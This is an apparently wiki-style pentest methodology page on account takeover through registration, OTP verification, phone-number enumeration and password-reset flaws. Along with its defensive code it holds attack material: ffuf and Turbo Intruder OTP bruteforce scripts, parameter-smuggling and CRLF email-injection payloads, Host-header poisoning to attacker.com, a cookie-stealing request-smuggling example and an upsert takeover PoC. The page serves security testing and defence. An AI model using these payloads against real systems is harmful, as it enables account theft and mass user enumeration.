Registration & Takeover Vulnerabilities


Account Takeover via Registration

Duplicate Registration

  • Try to create an account using an existing username
  • Try varying the email:
    • uppercase
    • +1@
    • add some dot in the email
    • special characters in the email name (%00, %09, %20)
    • Put some blank space after the email: test@test.com a
    • victim@gmail.com@attacker.com
    • victim@attacker.com@gmail.com
  • Try the email provider's canonicalization tricks (service dependent):
    • Gmail ignores dots and subaddressing: victim+1@gmail.com, v.ic.tim@gmail.com deliver to victim@gmail.com
    • Some providers are not case-sensitive in the local-part
    • Some providers accept unicode confusables. Try homoglyphs and the soft hyphen \u00AD inside the local-part
  • Use these to: bypass uniqueness checks, obtain duplicate accounts/workspace invites, or block victim sign‑ups (temporary DoS) while preparing a takeover
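As a defensive counterpart to the list above (added example, not code from the original page): a canonicalization routine a registration handler can run before its uniqueness check, covering trailing whitespace, multiple `@`, invisible characters, NFKC homoglyph folding, case, and Gmail-style dot/plus stripping. The provider list and the ASCII-only local-part policy are assumptions of this example.

```python
import re
import unicodedata
from typing import Optional, Set

# Invisible code points that must never survive in an address used for a uniqueness check
# (soft hyphen, zero-width characters, BOM, NUL). Constructed list for this example.
INVISIBLE = {"\u00ad", "\u200b", "\u200c", "\u200d", "\u2060", "\ufeff", "\x00"}
# Providers known to ignore dots and "+tag" subaddressing in the local-part (assumption).
DOT_PLUS_INSENSITIVE = {"gmail.com", "googlemail.com"}
DOMAIN_RE = re.compile(r"[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)+")


def canonical_email(raw: str) -> Optional[str]:
    """Canonical form for the uniqueness check, or None when the input is not one clean address."""
    s = raw.strip()                       # "test@test.com " is the same address as "test@test.com"
    if any(ch.isspace() or ch in INVISIBLE for ch in s):
        return None                       # "test@test.com a", soft hyphen, NUL, tab: reject outright
    if s.count("@") != 1:
        return None                       # victim@gmail.com@attacker.com and the reverse
    local, domain = s.split("@")
    # NFKC folds fullwidth letters and other compatibility homoglyphs to their ASCII forms;
    # whatever is still non-ASCII afterwards is rejected (policy choice: ASCII local-parts only)
    local = unicodedata.normalize("NFKC", local).lower()
    domain = unicodedata.normalize("NFKC", domain).lower()
    if not local or not local.isascii() or not DOMAIN_RE.fullmatch(domain):
        return None
    if domain in DOT_PLUS_INSENSITIVE:
        local = local.split("+", 1)[0].replace(".", "")
    return f"{local}@{domain}"


def is_duplicate(candidate: str, registered: Set[str]) -> bool:
    """True when the candidate collides with an already registered canonical address."""
    c = canonical_email(candidate)
    return c is not None and c in registered
```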

Username Enumeration

Check whether you can determine that a username is already registered in the application.

  • Different error messages or HTTP status codes
  • Timing differences (existing user may trigger lookup to IdP/DB)
  • Registration form autofill of profile data for known emails
  • Check team/invite flows: entering an email may reveal whether an account exists

Password Policy

When creating a user, check the password policy (check whether you can use weak passwords).
In that case you can try to bruteforce credentials.

SQL Injection

Check this page to learn how to attempt account takeovers or extract information via SQL Injections in registration forms.

OAuth Takeovers

OAuth to Account takeover

SAML Vulnerabilities

SAML Attacks

Change Email

Once registered, try changing the email and check whether the change is properly verified or whether it can be changed to arbitrary emails.

More Checks

  • Check whether you can use disposable emails (mailinator, yopmail, 1secmail, etc.) or bypass the blocklist with subaddressing like victim+mailinator@gmail.com
  • Long password (>200) leads to DoS
  • Check rate limits on account creation
  • Use username@burp_collab.net and analyze the callback
  • If phone number verification is used, check phone parsing/injection edge cases

Phone Number Injections

Captcha Bypass

Contact-discovery / identifier-enumeration oracles

Phone-number-based messengers expose a presence oracle every time a client syncs its contacts. Replaying WhatsApp's discovery requests historically allowed >100M lookups per hour, making it possible to enumerate nearly every account.

Attack flow

  1. Instrument an official client to capture the address-book upload request (authenticated blob of normalized E.164 numbers). Replay it with attacker-generated numbers while reusing the same cookies/device token.
  2. Batch numbers per request: WhatsApp accepts thousands of identifiers and returns registered/unregistered plus metadata (business, companion, etc.). Analyze responses offline to build target lists without messaging victims.
  3. Horizontally scale enumeration with SIM banks, cloud devices, or residential proxies so per-account/IP/ASN throttling never triggers.

Dialing-plan modeling

Model each country's dialing plan to avoid invalid candidates. The NDSS dataset (country-table.*) lists country codes, adoption density, and platform split so you can prioritise ranges with many hits. Example seeding code:

```python
import pandas as pd
from itertools import product

df = pd.read_csv("country-table.csv")
row = df[df["Country"] == "India"].iloc[0]  # density/platform columns used to rank ranges
prefix = "+91"  # India mobile numbers are 10 digits
for suffix in product("0123456789", repeat=10):
    candidate = prefix + "".join(suffix)
    enqueue(candidate)  # enqueue: the caller's work-queue function (not defined on this page)
```

Prioritise prefixes that match real allocations (Mobile Country Code + National Destination Code) before querying the oracle to keep throughput useful.

Turning enumerations into targeted attacks

  • Feed leaked phone numbers (e.g., Facebook’s 2021 breach) into the oracle to learn which identities are still active before phishing, SIM-swapping, or spamming.
  • Slice censuses by country/OS/app type to find regions with weak SMS filtering or heavy WhatsApp Business adoption for localized social engineering.

Public-key reuse correlation

WhatsApp exposes each account’s X25519 identity key during session setup. Request identity material for every enumerated number and deduplicate the public keys to reveal account farms, cloned clients, or insecure firmware—shared keys deanonymize multi-SIM operations.

Registration flows often verify ownership via a numeric OTP or a magic-link token. Typical flaws:

  • Guessable or short OTP (4–6 digits) with no effective rate limiting or IP/device tracking. Try parallel guesses and header/IP rotation.
  • OTP reuse across actions or accounts, or not bound to the specific user/action (e.g., same code works for login and signup, or works after email is changed).
  • Multi-value smuggling: some backends accept multiple codes and verify if any matches. Try:
    • code=000000&code=123456
    • JSON arrays: {"code":["000000","123456"]}
    • Mixed parameter names: otp=000000&one_time_code=123456
    • Comma/pipe separated values: code=000000,123456 or code=000000|123456
  • Response oracle: distinguish wrong vs expired vs wrong-user codes by status/message/body length.
  • Tokens not invalidated after success or after password/email change.
  • Verification token not tied to user agent/IP allowing cross-origin completion from attacker-controlled pages.

Bruteforcing example with ffuf against a JSON OTP endpoint:

```bash
ffuf -w <wordlist_of_codes> -u https://target.tld/api/verify -X POST \
  -H 'Content-Type: application/json' \
  -d '{"email":"victim@example.com","code":"FUZZ"}' \
  -fr 'Invalid|Too many attempts' -mc all
```

Parallel attempts to get around sequential throttling (use Turbo Intruder in Burp):

Turbo Intruder snippet to spray 6-digit OTP attempts:

```python
def queueRequests(target, wordlists):
    # RequestEngine and table are globals provided by Turbo Intruder
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=30, requestsPerConnection=100)
    for code in range(0, 1000000):
        body = '{"email":"victim@example.com","code":"%06d"}' % code
        engine.queue(target.req, body=body)


def handleResponse(req, interesting):
    if req.status != 401 and b'Invalid' not in req.response:
        table.add(req)
```

- Try racing verification: submit the same valid OTP simultaneously in two sessions; sometimes one session becomes a verified attacker account while the victim flow also succeeds.
- Also try Host header poisoning on verification links (same as reset poisoning below) to leak or complete verification on an attacker-controlled host.
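Added example (not code from the original page): a verifier written against the flaws listed above, which binds each code to a (user, purpose) pair, accepts exactly one six-digit ASCII string so smuggled arrays or joined values never reach the comparison, burns the code after a few wrong guesses, gives one uniform failure answer, and consumes the code on first success so a racing second submission fails. The in-memory store and the injectable clock are assumptions of this example.

```python
import hmac
import re
import secrets
import time
from dataclasses import dataclass
from typing import Dict

MAX_ATTEMPTS = 5        # a 6-digit code survives at most this many wrong guesses
OTP_TTL_SECONDS = 300


@dataclass
class Challenge:
    code: str
    expires_at: float
    attempts: int = 0
    consumed: bool = False


class OtpService:
    """Constructed in-memory issuer/verifier; every code is bound to (user, purpose)."""

    def __init__(self, now=time.time):
        self._now = now
        self._live: Dict[str, Challenge] = {}

    def issue(self, user_id: str, purpose: str) -> str:
        code = f"{secrets.randbelow(10**6):06d}"
        # one live challenge per (user, purpose): re-issuing replaces any older code
        self._live[f"{user_id}:{purpose}"] = Challenge(code, self._now() + OTP_TTL_SECONDS)
        return code

    def verify(self, user_id: str, purpose: str, submitted) -> str:
        # Exactly one ASCII 6-digit string is accepted: lists, repeated parameters and
        # comma/pipe-joined values are rejected before any lookup or comparison.
        if not isinstance(submitted, str) or not re.fullmatch(r"[0-9]{6}", submitted):
            return "rejected"
        key = f"{user_id}:{purpose}"          # a signup code never verifies a login or another user
        ch = self._live.get(key)
        if ch is None or ch.consumed or self._now() > ch.expires_at:
            return "rejected"
        ch.attempts += 1
        if ch.attempts > MAX_ATTEMPTS:
            del self._live[key]               # burn the code instead of letting guesses continue
            return "rejected"
        # constant-time compare and one uniform failure answer: no wrong/expired/other-user oracle
        if not hmac.compare_digest(ch.code, submitted):
            return "rejected"
        ch.consumed = True                    # single use; a real store must flip this atomically
        return "verified"
```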

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

A powerful class of issues occurs when an attacker performs actions on the victim’s email before the victim creates their account, then regains access later.

Main techniques to try (adapt to the target's flow):

- Classic–Federated Merge
  - Attacker: registers a classic account with the victim's email and sets a password
  - Victim: later signs up via SSO (same email)
  - Insecure merges can leave both sides logged in or preserve the attacker's access
- Unexpired Session Identifier
  - Attacker: sets up the account and keeps a long-lived session (never logs out)
  - Victim: resets/recovers the password and uses the account
  - Test whether old sessions remain valid after reset or after enabling MFA
- Trojan Identifier
  - Attacker: adds a secondary identifier to the pre-created account (phone, extra email, or links an attacker IdP)
  - Victim: performs a password reset; the attacker later uses the trojan identifier to change/reset/log in
- Unexpired Email Change
  - Attacker: starts an email change to the attacker's email and holds the confirmation
  - Victim: recovers the account and starts using it
  - Attacker: later completes the pending email change to steal the account
- Non‑Verifying IdP
  - Attacker: uses an IdP that does not verify email ownership to claim `victim@…`
  - Victim: signs up via the classic path
  - The service links by email without checking `email_verified` or performing its own verification

Practical notes

- Collect flows and endpoints from web/mobile bundles. Look for classic signup, SSO linking, email/phone change, and password reset endpoints.
- Build lightweight automation to keep sessions alive while you exercise other flows.
- For SSO tests, stand up a test OIDC provider and issue tokens with an `email` claim for the victim address and `email_verified=false` to check whether the RP trusts unverified IdPs.
- After a password reset or any email change, verify that:
  - all other sessions and tokens are revoked/invalidated,
  - any pending email/phone change capability is cleared,
  - previously linked IdPs/emails/phones are re-verified.
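Added example (not code from the original page) turning the checklist above into code: a federated-merge handler that refuses `email_verified=false` claims and never merges into an unverified classic account, and a reset-completion routine that revokes sessions, cancels a pending email change and distrusts previously linked identifiers and IdPs until re-proven. The `Account` model and the return strings are constructed for this example.

```python
from dataclasses import dataclass, field
from typing import Dict, Set


@dataclass
class Account:
    """Constructed model: each flag records whether a linked identifier was proven after the last reset."""
    email: str
    email_verified: bool = False
    password_hash: str = ""
    sessions: Set[str] = field(default_factory=set)
    pending_email_change: str = ""                                    # unconfirmed change, if any
    linked_idps: Dict[str, bool] = field(default_factory=dict)       # issuer -> still trusted
    secondary_ids: Dict[str, bool] = field(default_factory=dict)     # phone / alt email -> verified


def link_idp_identity(accounts: Dict[str, Account], issuer: str, claims: dict) -> str:
    """Federated sign-in against classic accounts. Returns the action taken (constructed policy)."""
    email = claims.get("email", "")
    if not claims.get("email_verified", False):
        return "rejected: IdP did not verify the email"    # a non-verifying IdP cannot claim victim@...
    acct = accounts.get(email)
    if acct is None:
        accounts[email] = Account(email, email_verified=True, linked_idps={issuer: True})
        return "created"
    if not acct.email_verified:
        # a classic account exists but never proved ownership: no silent merge
        return "rejected: existing account must verify its email first"
    acct.linked_idps[issuer] = True
    return "linked"


def complete_password_reset(acct: Account, new_password_hash: str) -> Account:
    """Everything set up before the reset stops working until the new owner re-proves it."""
    acct.password_hash = new_password_hash
    acct.sessions.clear()                                  # Unexpired Session Identifier
    acct.pending_email_change = ""                         # Unexpired Email Change
    for ident in acct.secondary_ids:                       # Trojan Identifier
        acct.secondary_ids[ident] = False
    for issuer in acct.linked_idps:                        # previously merged IdPs must re-verify
        acct.linked_idps[issuer] = False
    return acct
```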

Note: Extensive methodology and case studies of these techniques are documented by Microsoft’s pre‑hijacking research (see References at the end).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Request a password reset for your email address
2. Click on the password reset link
3. Don't change the password
4. Click any 3rd party websites (e.g.: Facebook, twitter)
5. Intercept the request in Burp Suite proxy
6. Check whether the referer header is leaking the password reset token.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header
```http
POST https://example.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: attacker.com
```
4. Look for a password reset URL based on the _host header_ like: `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```

IDOR on API Parameters

  1. The attacker has to log in with their own account and go to the Change password feature.
  2. Start Burp Suite and intercept the request
  3. Send it to the repeater tab and edit the parameters: User ID/email
```http
POST /api/changepass
[...]
("form": {"email":"victim@email.com","password":"securepwd"})
```

Weak Password Reset Token

The password reset token should be randomly generated and unique every time.
Try to determine whether the token expires or whether it is always the same; in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm:

  • Timestamp
  • UserID
  • Email of the user
  • First name and last name
  • Date of birth
  • Cryptography
  • Number only
  • Small token sequence (characters between [A-Z,a-z,0-9])
  • Token reuse
  • Token expiration date
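Added example (not code from the original page) doing the opposite of the weak schemes above: the token is 256 random bits from the OS CSPRNG, only its hash is stored, it expires and is single-use, the mailed link is built from a configured base URL rather than the Host header (the poisoning case above), the reset page sends a `Referrer-Policy` that stops the Referer leak, and the request endpoint never echoes the token in its response. `CANONICAL_BASE_URL`, `OUTBOX` and the in-memory store are constructed for this example.

```python
import hashlib
import secrets
import time
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlencode

# The link host is configuration, never the Host / X-Forwarded-Host request headers.
CANONICAL_BASE_URL = "https://example.com"      # constructed value for this example
RESET_TTL_SECONDS = 15 * 60
# Header the reset page should send so a click on a 3rd-party link cannot leak the token via Referer.
RESET_PAGE_HEADERS = {"Referrer-Policy": "no-referrer"}
OUTBOX: List[Tuple[str, str]] = []              # constructed stand-in for the mail sender


def _digest(token: str) -> str:
    return hashlib.sha256(token.encode()).hexdigest()


class ResetTokenStore:
    """Constructed in-memory store holding only token hashes, so a leaked table is not a leaked token."""

    def __init__(self, now=time.time):
        self._now = now
        self._rows: Dict[str, dict] = {}        # sha256(token) -> {"user_id", "expires_at"}

    def issue(self, user_id: str) -> str:
        token = secrets.token_urlsafe(32)       # 256 random bits: no timestamp, user id or counter
        self._rows = {h: r for h, r in self._rows.items() if r["user_id"] != user_id}  # revoke older ones
        self._rows[_digest(token)] = {"user_id": user_id, "expires_at": self._now() + RESET_TTL_SECONDS}
        return token

    def consume(self, token: str) -> Optional[str]:
        """Return the user id for a valid token; the row is removed on any use, so replay fails."""
        row = self._rows.pop(_digest(token), None)
        if row is None or self._now() > row["expires_at"]:
            return None
        return row["user_id"]


def reset_link(token: str) -> str:
    return f"{CANONICAL_BASE_URL}/reset-password?{urlencode({'token': token})}"


def request_reset(store: ResetTokenStore, users: Dict[str, str], email: str) -> dict:
    """API response to a reset request: identical whether or not the email exists, token never echoed."""
    user_id = users.get(email)
    if user_id is not None:
        OUTBOX.append((email, reset_link(store.issue(user_id))))
    return {"status": "ok", "message": "If that address is registered, a reset link has been sent."}
```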

Leaking Password Reset Token

  1. Trigger a password reset request using the API/UI for a specific email, e.g.: test@mail.com
  2. Inspect the server response and look for resetToken
  3. Then use the token in a URL like https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Password Reset Via Username Collision

  1. Register on the system with a username identical to the victim's username, but with white spaces inserted before and/or after the username. e.g.: "admin "
  2. Request a password reset with your malicious username.
  3. Use the token sent to your email and reset the victim's password.
  4. Log in to the victim's account with the new password.

The CTFd platform was vulnerable to this attack.
See: CVE-2020-7245

Account Takeover Via Cross Site Scripting

  1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain: *.domain.com
  2. Leak the current sessions cookie
  3. Authenticate as the user using the cookie

Account Takeover Via HTTP Request Smuggling

  1. Use smuggler to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)
```bash
git clone https://github.com/defparam/smuggler.git
cd smuggler
python3 smuggler.py -h
```
  2. Craft a request that will overwrite `POST / HTTP/1.1` with the following data:
     `GET http://something.burpcollaborator.net HTTP/1.1 X:` with the goal of open-redirecting victims to burpcollab and stealing their cookies
  3. The final request could look like the following
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X
```

HackerOne reports exploiting this bug

Account Takeover via CSRF

  1. Create a payload for the CSRF, e.g.: "HTML form with auto submit for a password change"
  2. Send the payload

Account Takeover via JWT

JSON Web Token might be used to authenticate a user.

  • Edit the JWT with another User ID / Email
  • Check for weak JWT signature

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

Some signup handlers perform an upsert when the supplied email already exists. If the endpoint accepts a minimal body containing email and password and enforces no ownership verification, submitting the victim's email overwrites their password before any verification takes place.

  • Discovery: harvest endpoint names from bundled JS (or mobile app traffic), then fuzz base paths like /parents/application/v4/admin/FUZZ using ffuf/dirsearch.
  • Technique notes: a GET returning messages like "Only POST request is allowed." often indicates the correct verb and that a JSON body is expected.
  • Minimal body observed in practice:
```json
{"email":"victim@example.com","password":"New@12345"}
```

PoC example:

```http
POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}
```

Impact: Full Account Takeover (ATO) without reset token, OTP, or email verification.
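Added example (not code from the original page): the upsert handler described above beside an insert-only version, together with the username normalization that closes the whitespace collision from the CTFd case earlier on this page. The password hashing is a constructed placeholder and the response strings are assumptions of this example.

```python
import hashlib
import hmac
import secrets
import unicodedata
from typing import Dict, Optional


def hash_password(pw: str) -> str:
    """Constructed placeholder; production code uses a memory-hard KDF such as argon2 or scrypt."""
    salt = secrets.token_hex(8)
    return salt + ":" + hashlib.sha256((salt + pw).encode()).hexdigest()


def check_password(stored: str, pw: str) -> bool:
    salt, digest = stored.split(":", 1)
    return hmac.compare_digest(digest, hashlib.sha256((salt + pw).encode()).hexdigest())


def canonical_username(raw: str) -> Optional[str]:
    """Collision defence: 'admin ', ' admin' and fullwidth variants map to 'admin'; inner spaces are rejected."""
    name = unicodedata.normalize("NFKC", raw).strip().casefold()
    if not name or any(ch.isspace() for ch in name):
        return None
    return name


def register_vulnerable(db: Dict[str, dict], email: str, password: str) -> str:
    """The upsert flaw from the page: an existing email silently gets a new password."""
    db[email] = {"password": hash_password(password), "verified": False}
    return "ok"


def register_hardened(db: Dict[str, dict], email: str, password: str, username: str) -> str:
    """Insert-only registration; an existing email or username is never modified."""
    uname = canonical_username(username)
    if uname is None:
        return "rejected: invalid username"
    if email in db or any(r.get("username") == uname for r in db.values()):
        # Same answer as a fresh signup so the endpoint is not an enumeration oracle;
        # the real owner would receive a notification instead of a password change.
        return "ok: check your email to verify the account"
    db[email] = {"password": hash_password(password), "username": uname, "verified": False}
    return "ok: check your email to verify the account"
```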

References
